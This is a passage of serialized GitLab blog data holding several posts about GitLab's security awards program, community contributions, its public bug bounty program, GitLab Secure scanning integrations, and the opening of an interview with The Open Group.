}",{"title":3298,"description":3299,"authors":3304,"heroImage":3300,"date":3306,"body":3307,"category":865,"tags":3308},[3305],"Philippe Lafoucrière","2021-05-14","\n\nSecurity is our [top priority](/handbook/product/product-processes/#prioritization) at GitLab, and like many software companies, we believe security \"is everyone's responsibility\". The more GitLab team and community members are involved, the better. However, we're also scaling quickly, delivering new and large features often and need to stay focused and aligned with our value of [results](https://handbook.gitlab.com/handbook/values/#results).\n\nBecause of this focus and pace, blind spots can develop when it comes to security, so extra hands, minds, and eyes bring immense value. All security contributions to our documentation, product, and workflow are \"actions\" we want to recognize and programs that celebrate those who go the extra-mile, think out-of-the-box, or cautiously assess threats and risk, are a great reminder that everyone can contribute to the ongoing effort that is security. This is why we created the [Security Awards Program](/handbook/security/security-awards-program.html).\n\n## How we built a Security Awards Program using GitLab values\n\nThe program, opened in 2020, is a simple construct: Every valid submission (or action) earns the reporter points and recognition, and prizes are awarded at the end of each quarter. All non-Security team members and community members are eligible to win a grand prize at the end of the year, where the individual with the highest number of points is awarded the top prize.\n\n### Efficiency: Start boring\n\nAt GitLab, every new project is an opportunity to live and apply our values. My personal favorite, [efficiency](https://handbook.gitlab.com/handbook/values/#efficiency), helped us start with a boring solution. The minimum achievement to start the program was to define a basic rule, and document it in our handbook. Nothing more. 
From this [initial merge request](https://gitlab.com/gitlab-com/www-gitlab-com/-/merge_requests/59279), we kicked off program communications and experimented with the first results. The feedback loop was extremely short, and adjustments were made accordingly.\n\n### Iteration: Improve it as you go along\n\nBecause a successful program needs to scale with time, [iteration](https://handbook.gitlab.com/handbook/values/#iteration) is key to maintain momentum and quickly improve. The first security award nominations arrived soon after we added the concept of the program to our handbook. To easily keep track of them and enable quick updates, we created a simple markdown file hosted in a specific project. While everything could have stayed the same, we knew automation would help us avoid human errors and ensure the program would scale. [Work done this past quarter](https://gitlab.com/groups/gitlab-com/gl-security/-/epics/105) means the nominations are now fetched weekly, the associated data updated and validated, and everything is published automatically.\n\nAnother recent iteration in our Security Awards Program is the move to [automatically reward security merge requests](/handbook/security/security-awards-program.html#automatic-rewards) (merged) that fix a security bug. Our product is not exempt from bugs or security issues and we saw the number of S3s and S4s (learn more about how we apply [severity labels](/handbook/security/#severity-and-priority-labels-on-security-issues)) rising lately.  Adding automatic rewards to target and incentivize identifying these security issues is predictable, simple to employ, and helps us reduce security bugs.\n\n### Collaboration: Everyone adds value\n\nTo be successful, we knew we needed a thriving program that enabled [collaboration](https://handbook.gitlab.com/handbook/values/#collaboration) across the organization and beyond. 
We work with our AppSec team to identify the initiatives we want to encourage and incentivize, as well as on the overall evaluation of submitted \"actions\". The workflow here is simple: Once it is identified, an \"action\" (an issue or a merge request) is labeled with a \"nomination\" label. Every week, the nominations are imported into a single awards council issue in GitLab for asynchronous discussion. Each nomination is a [thread](https://docs.gitlab.com/ee/user/discussions/) in the council issue, and we use [award emojis](https://docs.gitlab.com/ee/user/award_emojis.html) to set the number of votes. Votes translate to points awarded to the author of the \"action\".\n\n![Screenshot of GitLab Bot message in issue](https://about.gitlab.com/images/blogimages/gitlab-bot-awards-message.png){: .shadow.medium.center}\nWe engage with nominees when they're awarded, extending the visibility of the program and providing an instant feedback loop.\n{: .note.text-center}\n\n### Diversity, inclusion and belonging: New, better ideas\n\nRemember that at GitLab, everyone can contribute. Contributions from the wider GitLab community are essential to maintaining the level of security we expect for our product. The broad and diverse talents of the global GitLab community and our [diversity, inclusion, and belonging](https://handbook.gitlab.com/handbook/values/#diversity-inclusion) value drive inclusivity into this program and we're proud that [community contributions](/handbook/security/security-awards-program.html#community-contributions) play a key role in this program. We also have multiple categories for submissions to encourage participation from engineers and non-engineers alike to ensure we have diversity of thought and innovation.\n\n#### 👉 We want your contributions! 🙌\nThere are multiple ways to contribute and you can see them outlined in this [contribution guide](/community/contribute/). 
Any [actions that contribute to the security of GitLab](/handbook/security/security-awards-program.html#eligible-actions) are considered and have the potential to be recognized in our Security Awards Program.\n\nNote: For bug bounty hunters interested in researching security vulnerabilities on our platform,  we have a [bug bounty program on HackerOne](https://hackerone.com/gitlab?type=team) where security researchers are invited to submit security bug reports directly for bounties. Those submissions are not considered under this program, but are still really important to us.\n\n### Results: Security fixes and awareness\n\nThis one is easy. The more bugs we spot and fix, the stronger our product is for our customers, the broader community, and our own teams, who use GitLab daily. Beyond this, the Security Awards Program is a great way to spread knowledge about what we're prioritizing on the Security team and the GitLab issues we use for awards council voting and discussion are a nice weekly resource to generate awareness of changes that matter!\n\n### Transparency: Increases visibility and collaboration\n\nThe final GitLab value at play here is – last but not least – [transparency](https://handbook.gitlab.com/handbook/values/#transparency). It's been widely acknowledged that transparency and security don't always easily mix. And, sure, we admit it's more difficult, but not impossible. Our Security Awards Program is meant to be as transparent as possible, while ensuring no confidential information is leaked through our pipelines. We also try to [dogfood as much as we can](/handbook/product/product-processes/#dogfood-everything) here, so the transparency around this program presents a great opportunity to experiment with our new [threat modeling process](/handbook/security/threat_modeling/). This careful review allows us to keep the source code open and make the whole process available in the handbook. 
While the \"actions\" rewarded are often confidential since they are related to vulnerabilities or security issues, the [leaderboard with the awarded people](/handbook/security/awards/leaderboard-fy22.html) is completely public.\n\nOur journey to recognize security initiatives is just getting started. Fleshed out in the spirit of our values, our Security Awards Program is showing constant progress and results, leading to security awareness, engagement, and a more secure organization and product.\n\n## Congrats and thank you to our current top 10 contributors 🎉 :\n\n| Contributor | Rank in their category | Points |\n| [@cablett](/company/team/#cablett) | 1 | 600 |\n| [@alexkalderimis](/company/team/#alexkalderimis) | 2 | 500 |\n| [@engwan](/company/team/#engwan) | 3 | 480 |\n| [@whaber](/company/team/#whaber) | 4 | 400 |\n| [@alexpooley](/company/team/#alexpooley) | 5 | 400 |\n| [@theoretick](/company/team/#theoretick) | 6| 400 |\n| [@sabrams](/company/team/#sabrams) | 7 | 300 |\n| [@tmaczukin](/company/team/#tmaczukin) | 8 | 300 |\n| [@nolith](/company/team/#nolith) | 1 | 300 |\n| [@emanuele.divizio](https://gitlab.com/emanuele.divizio) | 1 | 300 |\n\nHow do you reward and recognize security fixes in your organization? Is there something more or different we could do in our Security Awards Program? 
Tell us in the comments!\n",[865,803,9],{"slug":3310,"featured":6,"template":689},"how-we-used-gitlab-values-to-build-a-security-awards-program","content:en-us:blog:how-we-used-gitlab-values-to-build-a-security-awards-program.yml","How We Used Gitlab Values To Build A Security Awards Program","en-us/blog/how-we-used-gitlab-values-to-build-a-security-awards-program.yml","en-us/blog/how-we-used-gitlab-values-to-build-a-security-awards-program",{"_path":3316,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3317,"content":3323,"config":3328,"_id":3330,"_type":14,"title":3331,"_source":16,"_file":3332,"_stem":3333,"_extension":19},"/en-us/blog/how-you-contribute-to-gitlabs-open-devops-platform",{"title":3318,"description":3319,"ogTitle":3318,"ogDescription":3319,"noIndex":6,"ogImage":3320,"ogUrl":3321,"ogSiteName":673,"ogType":674,"canonicalUrls":3321,"schema":3322},"How you contribute to GitLab's DevOps Platform","Today we're celebrating you! These are just some of the many examples of how you make GitLab's DevOps Platform better by innovating together.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749664041/Blog/Hero%20Images/open-devops.png","https://about.gitlab.com/blog/how-you-contribute-to-gitlabs-open-devops-platform","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How you contribute to GitLab's DevOps Platform\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"GitLab\"}],\n        \"datePublished\": \"2021-03-23\",\n      }",{"title":3318,"description":3319,"authors":3324,"heroImage":3320,"date":2561,"body":3325,"category":10,"tags":3326},[970],"\n\nWe know that we can iterate faster when we innovate together. We want to highlight how you make GitLab better every day by contributing to our DevOps Platform, by suggesting improvements, submitting bug fixes, and contributing features. \n\nYou contribute around 300 merge requests to GitLab each month. 
Just look at [last month's release for a multitude of examples](/releases/2021/02/22/gitlab-13-9-released/#wider-community-contribution-highlights) – a reminder that [everyone can contribute](/company/mission/#mission). \n\n{::options parse_block_html=\"false\" /}\n\n\u003Cdiv class=\"center\">\n\n\u003Cblockquote class=\"twitter-tweet\">\u003Cp lang=\"en\" dir=\"ltr\">Achievement unlocked: having NASA contribute directly to your codebase. Open core ftw. \u003Ca href=\"https://t.co/qcnu8jhQuR\">https://t.co/qcnu8jhQuR\u003C/a>\u003C/p>&mdash; Brendan O’Leary (@olearycrew) \u003Ca href=\"https://twitter.com/olearycrew/status/1363992971188740103?ref_src=twsrc%5Etfw\">February 22, 2021\u003C/a>\u003C/blockquote> \u003Cscript async src=\"https://platform.twitter.com/widgets.js\" charset=\"utf-8\">\u003C/script>\n\n\u003C/div>\n\nRoger Meier, principal key expert and service owner of code.siemens.com from [Siemens IT](/customers/siemens/) explains, “If we want to have new features, we contribute them to GitLab.” \n\n## A DevOps platform gives you visibility into security and beyond\n\nWorking in the open presents unique security challenges (you can read about how we [prevent security fixes from leaking into our public repositories](/blog/how-we-prevented-security-fixes-leaking-into-our-public-repositories/)), but we’re proud of how taking an open approach to security serves our community, customers, and us.  
\n\nCommunity member [Ethan Reesor](https://gitlab.com/firelizzard) is working on improving and simplifying how we do [authorization in our package managers](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/38627) and added some great test coverage around that in [gitlab-org/gitlab!50729](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/50729).\n\nSecurity issues are often reported to us directly in GitLab, but Dominic Couture, senior security engineer, [Application Security](/topics/devsecops/) at GitLab, explains that even security bugs reported through our [HackerOne bug bounty program](https://hackerone.com/gitlab) are often made public 30 days after they’re fixed: everyone can see the [old security issues](https://gitlab.com/gitlab-org/gitlab/-/issues?scope=all&utf8=%E2%9C%93&state=all&label_name[]=HackerOne). “This creates a positive feedback loop where external security researchers can look into old issues to help them find and disclose new ones to us.” You can read more reflections on [security and open source here](/blog/open-source-security/).\n\n### Debugging together\n\nOur customers regularly collaborate with us to debug problems. In this example, a customer helped our backend engineers to [resolve an S1 bug](https://gitlab.com/gitlab-org/gitlab/-/issues/261667), and even gave us access to part of their system to test the fix – showing that we’re most successful when everyone’s committed to iteration.\n\nSmall fixes and improvements to our documentation often arise out of customer interactions with our support engineers – you can see all the [merge requests from 2021 captured here](https://gitlab.com/gitlab-com/support/support-team-meta/-/issues?label_name%5B%5D=Support+Team+Contributions).\n\nFor some customers, contributing to GitLab is even an official part of their job. 
Learn about how [one of our contributors at CERN here](/blog/cern-contributor-post/) helps make GitLab’s [open DevOps platform](/solutions/devops-platform/) better.\n\n### Getting to the root of performance problems\n\n[Working in public by default](https://handbook.gitlab.com/handbook/values/#public-by-default) is a little uncomfortable at first – especially when it comes to troubleshooting performance issues – but the advantage of this visibility is that we can crowdsource solutions. \n\nIn July 2019, our site reliability engineers noticed a significant increase in errors and site slowdown on GitLab.com. In the course of investigation, community member [Andrew Armstrong](https://gitlab.com/phplasma) [commented on the public issue ](https://gitlab.com/gitlab-com/gl-infra/production/-/issues/928#note_187236004) with a suggestion: The Redis instance might be approaching its self-imposed memory limit, which can overwhelm the instance quickly even if plenty of physical memory is available. This inspired a review of the time to live (TTL) we apply to Redis keys.\n\n## Living our values through DevOps \n\nWe're proud to partner with groups who foster [our values](https://handbook.gitlab.com/handbook/values/) in their communities. [The Last Mile](/blog/thelastmile-gitlab/) is opening doors for aspiring software engineers at correctional facilities across the US. [GNOME moved to GitLab in 2018](/blog/welcome-gnome-to-gitlab/), and together with [Endless](https://endlessnetwork.com/) they [launched the Coding Education Challenge](/blog/gnome-follow-up/#whats-new-at-gnome-and-what-are-some-of-the-new-things-on-the-horizon) to inspire a new generation to \"take control of their digital worlds, not be controlled by them.\" Read more about intitiatives from our [friends in open source](/blog/categories/open-source/). 
\n\n_These are just a few examples of the improvements you make to GitLab and the wider community, and we want to keep celebrating how you iterate and innovate using our open DevOps platform. Got a story of your own to share? **We’re accepting proposals for our virtual user conference, [GitLab Commit](/events/commit/)** (Aug. 3-4, 2021) and would love to hear from you._\n",[9,267,3327],"DevOps platform",{"slug":3329,"featured":6,"template":689},"how-you-contribute-to-gitlabs-open-devops-platform","content:en-us:blog:how-you-contribute-to-gitlabs-open-devops-platform.yml","How You Contribute To Gitlabs Open Devops Platform","en-us/blog/how-you-contribute-to-gitlabs-open-devops-platform.yml","en-us/blog/how-you-contribute-to-gitlabs-open-devops-platform",{"_path":3335,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3336,"content":3342,"config":3348,"_id":3350,"_type":14,"title":3351,"_source":16,"_file":3352,"_stem":3353,"_extension":19},"/en-us/blog/inside-the-gitlab-public-bug-bounty-program",{"title":3337,"description":3338,"ogTitle":3337,"ogDescription":3338,"noIndex":6,"ogImage":3339,"ogUrl":3340,"ogSiteName":673,"ogType":674,"canonicalUrls":3340,"schema":3341},"Inside the GitLab public bug bounty program","Four months since going public with our bug bounty program, we dive into where we’re at, what success looks like, and what to expect down the road.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749679034/Blog/Hero%20Images/inside-gitLab-public-bug-bounty-program.png","https://about.gitlab.com/blog/inside-the-gitlab-public-bug-bounty-program","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Inside the GitLab public bug bounty program\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Kathy Wang\"}],\n        \"datePublished\": \"2019-04-29\",\n      
}",{"title":3337,"description":3338,"authors":3343,"heroImage":3339,"date":3345,"body":3346,"category":865,"tags":3347},[3344],"Kathy Wang","2019-04-29","\nAt GitLab, our Security Team has two top-level missions that all of our goals must map to:\n\n1. Secure the product and service.\n2. Protect the company.\n\nWe understand that source code is often the crown jewel of any organization. This is true of the [open core](/blog/gitlab-is-open-core-github-is-closed-source/) code that powers GitLab itself, so we are constantly applying our value of [results](https://handbook.gitlab.com/handbook/values/#results) and [iteration](https://handbook.gitlab.com/handbook/values/#iteration) to the benefit of all GitLab users.\n\nThere are a few basic truths about security:\n\n- Security is about people, process, and technology. Understanding how to optimally balance those pillars is crucial to an effective strategy and strong security posture.\n- Security cannot block business process and the ability to get work done.\n- Security is never 100 percent, and a multi-layer approach must be taken to reduce risk.\n\n## Proactive and reactive security measures\n\nIt makes sense to think about security in terms of proactive and reactive measures, as both are required to truly implement defense-in-depth security. When it comes to [application security](/topics/devsecops/), proactive measures include conducting internal application security reviews and educating developers on secure coding best practices. However, the ratio of developers to application security engineers is high, so the feasibility for organizations to review every single line of code manually is decreasing. Code scanning measures introduce automation in reviewing, but could also miss findings.\n\nEnter reactive measures, such as internal red teams and public bug bounty programs. 
These come in after the fact – after the source code is written and committed – and provide another, necessary layer of security to our environment.\n\nSince launching GitLab’s [public bug bounty program](/blog/gitlab-hackerone-bug-bounty-program-is-public-today/) in December 2018, we’ve resolved 95 security findings, awarded more than $300,000 in bounties and rewarded over 35 hackers for those findings. The overarching goal of our bug bounty program is to make our products and services more secure, and we’re proud of the early success we’ve seen to date.\n\n## How are we measuring success?\n\nWe’re looking at several key metrics and focus areas to determine what’s working and what needs to improve. In fact, our next blog post will dive into some of our early lessons learned, and the process and program improvements we’ve made to ensure we’re meeting our goal.\n\n### Quantity of new report submissions\n\nWe look at the total number of reports received and the average of new reports created each month to help us ensure we’re moving in the right direction in terms of incentivization and engagement amongst our HackerOne reporters. In just the first three months after making our bug bounty program public, we received 266 new reports. That’s an average of 88.6 reports per month. Of those reported, 76 were triaged as valid and 89 were resolved. We classify triaged reports as those for which we’ve assessed a potential user impact, and resolved reports are those we’ve investigated and resolved.\n\n### Repeat reporters\n\nWhen we have reporters who continue to submit findings to our program, that’s another signal that we are on the right track in terms of incentivizing and supporting their efforts so that they keep coming back. Out of a total of 247 reporters from the past year, 38 percent have submitted more than one, 13 percent more than five, and 6 percent more than 10 reports.\n\n#### Check out the top five GitLab reporters (by bounty):\n\n1. 
[ngalog](https://hackerone.com/ngalog)\n1. [jobert](https://hackerone.com/jobert)\n1. nyangawa\n1. [fransrosen](https://hackerone.com/fransrosen)\n1. [xanbanx](https://hackerone.com/xanbanx)\n\n### Transparency\n\nThe majority of reporters want to make their vulnerability reports public to showcase their findings and techniques and, also, just for some good ol’ fashioned bragging rights within the hacker community. There’s also a real need in this community to be constantly challenged and a dedication to learning that public disclosure helps to satisfy. Many other bug bounty programs don’t publicly release the full details of their vulnerability reports and subsequently discourage the HackerOne community from sharing or showing off their findings. However, as one of GitLab's values is [transparency](https://handbook.gitlab.com/handbook/values/#transparency), we set all vulnerability details to public in our [issue tracker](https://gitlab.com/groups/gitlab-org/-/issues?scope=all&utf8=%E2%9C%93&state=closed&label_name[]=security&label_name[]=HackerOne) 30 days after a patch has been [released](/releases/categories/releases/).\n\n### Responsiveness\n\nThe HackerOne community expects responsiveness in the communication of updates and payment of bounties. To help ensure we respond and triage as quickly as possible, we’ve built in automation so that we can provide timely initial and ongoing feedback to reporters, as well as continuous updates on the ETA of fixes for existing reports. We’re working in the area of bounties payment to improve our process and reward bounties immediately after triage, where applicable, rather than when fixed. Expect to hear more on this in forthcoming bug bounty blog posts!\n\n### Competitive rewards\n\nOur desire is to be the number one paying bounty company in our industry. This aim is to keep reporters incentivized, motivated, and engaged to find bugs on our platform. 
Our public bug bounty program is as important to the security of our product and company as any other program we run within our Security Team here at GitLab. That's why we’re continually looking to improve our processes and incentive structure to benefit our reporter community.\n\n{::options parse_block_html=\"true\" /}\n\n\u003Ci class=\"fab fa-gitlab\" style=\"color:rgb(107,79,187); font-size:.85em\" aria-hidden=\"true\">\u003C/i>&nbsp;&nbsp;\nWe know a big, fat check speaks volumes, but we also know some cool swag is a nice little pat on the back too. So, we’re putting it out there – if you could put a GitLab Tanuki on any piece of swag – what would it be?  Leave us a comment below!\n&nbsp;&nbsp;\u003Ci class=\"fab fa-gitlab\" style=\"color:rgb(107,79,187); font-size:.85em\" aria-hidden=\"true\">\u003C/i>\n{: .alert .alert-webcast}\n",[267,865,9,995],{"slug":3349,"featured":6,"template":689},"inside-the-gitlab-public-bug-bounty-program","content:en-us:blog:inside-the-gitlab-public-bug-bounty-program.yml","Inside The Gitlab Public Bug Bounty Program","en-us/blog/inside-the-gitlab-public-bug-bounty-program.yml","en-us/blog/inside-the-gitlab-public-bug-bounty-program",{"_path":3355,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3356,"content":3362,"config":3368,"_id":3370,"_type":14,"title":3371,"_source":16,"_file":3372,"_stem":3373,"_extension":19},"/en-us/blog/integrating-with-gitlab-secure",{"title":3357,"description":3358,"ogTitle":3357,"ogDescription":3358,"noIndex":6,"ogImage":3359,"ogUrl":3360,"ogSiteName":673,"ogType":674,"canonicalUrls":3360,"schema":3361},"How open source contributions accelerate GitLab Secure","Community contributions and an open integration framework allows anyone to extend GitLab Secure","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749668622/Blog/Hero%20Images/group-rowing-collaboration.jpg","https://about.gitlab.com/blog/integrating-with-gitlab-secure","\n                        {\n        \"@context\": 
\"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How open source contributions accelerate GitLab Secure\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Taylor McCaslin\"}],\n        \"datePublished\": \"2020-10-22\",\n      }",{"title":3357,"description":3358,"authors":3363,"heroImage":3359,"date":3365,"body":3366,"category":10,"tags":3367},[3364],"Taylor McCaslin","2020-10-22","\nWhen you think about security you probably imagine locks, gates, and closed systems. This is the more traditional approach to security but modern security is much more open and collaborative. If you want to build the most secure systems, there is nothing better than building those systems in the open. Open security practices allow you to get fast feedback from a broad audience with diverse perspectives, helping you build better more holistic solutions. That's our approach to building [GitLab Secure](/stages-devops-lifecycle/secure/) at GitLab. We're leveraging amazing open source security projects, the collective contribution of the wider community, and providing an open integration system for anyone to build on top of GitLab security scanners.\n\n## Shifting left\n\nTraditional security approaches are opaque and late in the development life cycle. Security scans are performed by isolated security experts long after developers write code, often after it's deployed to production. GitLab aims to make security an integrated and continuous process. That's why we've built [GitLab Secure directly integrated into the DevOps life cycle](/solutions/security-compliance/). 
We are taking security tools and \"shifting left\" to make these tools more accessible to developers earlier in the development life cycle and integrated directly into developers' workflows.\n\n![Traditional Security vs DevSecOps with GitLab](https://about.gitlab.com/images/blogimages/traditional-security-vs-integrated.png)\n\nWe created a detailed survey to learn more about the [2020 DevSecOps Landscape](/developer-survey/#security). The results of the survey indicated that security is still a significant hurdle for most organizations that use DevOps, and show:\n\n- Only 13% of companies give developers access to the results of [application security](/topics/devsecops/) tests\n- Over 42% said testing happens too late in the lifecycle\n- 36% reported it was hard to understand, process, and fix any discovered vulnerabilities\n- 31% found prioritizing vulnerability remediation an uphill battle\n\nThese statistics illustrate why we are building security scanning directly into GitLab with our Secure features. We want to provide integrated security tools to broaden access and make it easier for everyone using GitLab to write more secure code.\n\n## Integrating security tools into everyday workflows\n\nGitLab Secure enables accurate, automated, and continuous assessment of your applications and services, allowing users to proactively identify vulnerabilities and weaknesses to minimize security risk. Secure is not an additional step in your development process nor an additional tool to introduce to your software stack. 
It is woven into your DevOps cycle, which allows you to adapt security testing and processes to your developers (and not the other way around).\n\nToday [GitLab Secure](/stages-devops-lifecycle/secure/) offers support for a variety of security scanning tools including:\n- [Static Application Security Testing (SAST)](https://docs.gitlab.com/ee/user/application_security/sast/)\n- [Dynamic Application Security Testing (DAST)](https://docs.gitlab.com/ee/user/application_security/dast/)\n- [Container Scanning](https://docs.gitlab.com/ee/user/application_security/container_scanning/)\n- [Dependency Scanning](https://docs.gitlab.com/ee/user/application_security/dependency_scanning/)\n- [License Scanning](https://docs.gitlab.com/ee/user/compliance/license_compliance/index.html)\n- [Secret Detection](https://docs.gitlab.com/ee/user/application_security/secret_detection/)\n- [API Fuzzing](https://docs.gitlab.com/ee/user/application_security/api_fuzzing/)\n- [Coverage Fuzzing](https://docs.gitlab.com/ee/user/application_security/coverage_fuzzing/)\n\nAll of these tools provide unique approaches to finding security problems. No one tool is best at everything, so we wanted to provide a way to leverage many tools in an integrated way, so you're always getting the most relevant security results. Take a look at how GitLab Secure integrates all these tools into common developer workflows on GitLab:\n\n\u003Cfigure class=\"video_container\">\n  \u003Ciframe src=\"https://www.youtube.com/embed/XnYstHObqlA\" frameborder=\"0\" allowfullscreen=\"true\"> \u003C/iframe>\n\u003C/figure>\n\n## Democratizing security\n\nWith GitLab Secure, we've laid the foundation for bringing security tools directly into developers' workflows. At GitLab, we believe in a world where [everyone can contribute](/company/culture/#everyone-can-contribute). 
[Collaboration](https://handbook.gitlab.com/handbook/values/#collaboration) and [transparency](https://handbook.gitlab.com/handbook/values/#transparency) are part of our core values. This approach changes the way we build security features. That's why as part of our [community stewardship promise](/company/stewardship/#promises) we've made all our open source based [SAST scanners available for all users](/releases/2020/08/22/gitlab-13-3-released/#sast-security-analyzers-available-for-all), we offer [open source projects and nonprofits free access to our best features](/solutions/open-source/join/), and we've created a [security scanner integration framework](https://docs.gitlab.com/ee/development/integrations/secure.html) to allow anyone to contribute security scan tools. Our entire [product strategy and vision](/direction/secure/) is also open source, so everyone can understand our vision for an integrated, accessible, and democratic approach to security. Together we can build a more open and modern security approach that helps developers everywhere write more secure code.\n\n## Integrate with GitLab Secure\n\nOut of the box, GitLab provides a variety of pre-integrated and actively managed open source security tools, such as [SAST's 16 analyzers](https://docs.gitlab.com/ee/user/application_security/sast/#supported-languages-and-frameworks) that all support automatic language detection to always run the most relevant security tool. While GitLab will continue to update and build first-party integrations we wanted to ensure that GitLab contributors and integration partners could easily extend GitLab Secure for third-party tools. Our [open integration framework](https://docs.gitlab.com/ee/development/integrations/secure.html) makes it easy for anyone to leverage all of the [features of GitLab Secure](/pricing/feature-comparison/) with any scanning tool they may want to integrate. 
You can see all the tools GitLab users have requested support for and even add your own request in our [tracking epic](https://gitlab.com/groups/gitlab-org/-/epics/297).\n\n## Community contributions\n\nWith our open integration framework we've seen members of the [GitLab community](/community/) contribute additional security scanners, help maintain the existing open source scanners we offer and expand the list of supported languages and frameworks we support. Our community contributors are helping every GitLab user have access to more accurate, sophisticated, and relevant security results. Here are some recent community contribution highlights:\n\n- [Mobile SAST support via MobSF](https://gitlab.com/gitlab-org/gitlab/-/issues/233777) (contribution by [@williams.brian-heb](https://gitlab.com/williams.brian-heb)) - [GitLab 13.5 Release MVP](/releases/2020/10/22/gitlab-13-5-released/#mvp)\n- [Adding Helm Chart support](https://gitlab.com/gitlab-org/gitlab/-/issues/36755) (contribution by [@agixid](https://gitlab.com/agixid))\n- [Performance improvements to Fuzz testing](https://gitlab.com/gitlab-org/security-products/analyzers/fuzzers/pythonfuzz/-/merge_requests/1) (contribution by [@jvoisin](https://gitlab.com/jvoisin))\n- [Updates to secret detection](https://gitlab.com/gitlab-org/gitlab/-/issues/205172) (contribution by [@tnir](https://gitlab.com/tnir))\n- [Dependency scanning bugfixes](https://gitlab.com/gitlab-org/gitlab/-/issues/205172) (contribution by [@fcbrooks](https://gitlab.com/fcbrooks))\n- [Updates to Security Scanner underlying operating systems](https://gitlab.com/gitlab-org/gitlab/-/issues/216781) (contribution by [@J0WI](https://gitlab.com/J0WI))\n- [Contributions for .NET Framework Support](https://gitlab.com/gitlab-org/security-products/analyzers/security-code-scan/-/merge_requests/14) (contribution by [@agixid](https://gitlab.com/agixid))\n- [See the full list of Secure community 
contributions](https://gitlab.com/gitlab-org/gitlab/-/issues?scope=all&utf8=%E2%9C%93&state=all&label_name[]=Community%20contribution&label_name[]=devops%3A%3Asecure)\n\nThe open source nature of GitLab allows the community to help improve, maintain, and contribute features within GitLab. This is the ultimate value of open source. Even if we don't offer something, you can always extend or modify the behavior of GitLab to accomplish your goal. When compared to closed-source Security vendors, this is a huge benefit. The impact these contributions have is massive as GitLab Secure is used by tens of thousands of customers and performs hundreds of thousands of security scans every month. If you are interested in contributing, check out our [contributor program](/community/contribute/) and [contributor documentation](https://docs.gitlab.com/ee/development/contributing/).\n\n## Integration partners\n\nCommunity contributions aren't the only way GitLab Secure is being extended. We have a variety of integration partners who provide security integrations that further expand the suite of security tools available to GitLab users. Check out the [GitLab Security integrations](/partners/#security) our partners offer. If you are a security vendor interested in integrating with GitLab, [join our partner program](/handbook/alliances/integration-instructions/) today.\n\n## Looking ahead\n\nWe've come a long way in the past few years with GitLab Secure and we're not done yet. Our [vision is bold (and open source)](/direction/secure/) and [our investment in security is large](https://internal.gitlab.com/handbook/product/investment/). 
[Security is a team effort](/direction/secure/#security-is-a-team-effort) and we hope you'll join us on our mission to help developers write more secure code.\n\n## Read more about GitLab SAST:\n\n* GitLab [Secure Direction](/direction/secure/)\n* Learn more about [integrating with GitLab Secure](https://docs.gitlab.com/ee/development/integrations/secure.html)\n* View the latest [October 2020 GitLab security trends](/blog/gitlab-latest-security-trends/)\n\nCover image by [Mitchell Luo](https://unsplash.com/@mitchel3uo) on [Unsplash](https://unsplash.com/s/photos/rowing-team)\n{: .note}\n",[109,685,865,267,708,9],{"slug":3369,"featured":6,"template":689},"integrating-with-gitlab-secure","content:en-us:blog:integrating-with-gitlab-secure.yml","Integrating With Gitlab Secure","en-us/blog/integrating-with-gitlab-secure.yml","en-us/blog/integrating-with-gitlab-secure",{"_path":3375,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3376,"content":3382,"config":3386,"_id":3388,"_type":14,"title":3389,"_source":16,"_file":3390,"_stem":3391,"_extension":19},"/en-us/blog/interview-the-open-group",{"title":3377,"description":3378,"ogTitle":3377,"ogDescription":3378,"noIndex":6,"ogImage":3379,"ogUrl":3380,"ogSiteName":673,"ogType":674,"canonicalUrls":3380,"schema":3381},"Get to know our newest open source partner, The Open Group","The Open Group leaders explain how the organization uses GitLab to build and maintain open standards for transformative digital technologies.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749679170/Blog/Hero%20Images/migration-data.jpg","https://about.gitlab.com/blog/interview-the-open-group","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Get to know our newest open source partner, The Open Group\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Bryan Behrenshausen\"}],\n        \"datePublished\": \"2023-06-20\",\n      
}",{"title":3377,"description":3378,"authors":3383,"heroImage":3379,"date":1513,"body":3384,"category":10,"tags":3385},[2909],"\n\nFor more than 30 years, [The Open Group](https://www.opengroup.org/) has served as a steward and champion of [open source](https://go.gitlab.com/spHNym) technologies, helping companies achieve business objectives through [open technological standards](http://www.opengroup.org/standardsprocess/main.html). Today, many of the group's approximately 900 member organizations participate in the work of ensuring critical digital technologies remain open and accessible.\n\nThe Open Group recently joined the [GitLab Open Source Partners](https://go.gitlab.com/030Ue3) community, where it can connect with other large-scale, open source consortia and projects using GitLab to advance the state of the open source art. So I brewed a cup of tea and sat down with two of the group's team members — Vice President and CTO [Andras Szakal](https://pages.opengroup.org/aszakal) and GitLab administrator [David Diederich](https://pages.opengroup.org/divido) — to hear how using GitLab helps them achieve their group's mission. 
